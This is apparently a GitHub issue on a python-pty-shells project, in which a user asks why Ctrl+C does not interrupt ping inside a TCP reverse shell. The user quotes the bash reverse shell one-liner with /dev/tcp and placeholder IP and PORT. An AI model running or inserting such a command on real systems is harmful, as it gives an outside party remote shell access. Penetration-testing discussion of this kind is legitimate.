python-pty-shells icon indicating copy to clipboard operation
python-pty-shells copied to clipboard

can't use ctrl + c

Open Schira4396 opened this issue 5 years ago • 0 comments

When I use TCP reverse shell, I can’t use ctrl + C when I use the ping command. Why? When using nano or vi, you can use ctrl + C

But the reverse connection script I used is bash -i >& /dev/tcp/IP/PORT 0>&1,You know this is the most commonly used reverse connection payload

I really look forward to hearing from you, thanks

Schira4396 avatar Oct 22 '20 03:10 Schira4396